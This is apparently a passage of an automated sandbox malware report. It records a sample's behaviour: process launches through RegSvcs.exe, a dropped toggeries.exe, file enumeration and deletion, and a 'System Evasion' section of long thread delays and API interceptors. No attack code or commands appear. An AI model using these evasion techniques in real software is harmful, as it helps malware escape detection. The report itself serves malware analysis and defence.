                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeAPI/Special instruction interceptor: Address: F668AC
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeAPI/Special instruction interceptor: Address: C407C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599780Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599560Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598726Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598171Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597507Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596530Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596306Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596166Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595355Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595249Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595030Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594702Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599782Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593954Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1845Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8002Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1999Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7812Jump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105712
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeAPI coverage: 5.9 %
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeAPI coverage: 6.1 %
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0094445A
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094C6D1 FindFirstFileW,FindClose,0_2_0094C6D1
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0094C75C
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0094EF95
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0094F0F2
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0094F3F3
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009437EF
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00943B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00943B12
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0094BCBC
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_00B4445A
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4C6D1 FindFirstFileW,FindClose,2_2_00B4C6D1
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00B4C75C
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B4EF95
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B4F0F2
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B4F3F3
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00B437EF
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00B43B12
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B4BCBC
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E49A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599780Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599560Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598726Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598171Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597507Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596530Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596306Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596166Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595355Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595249Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595030Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594702Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
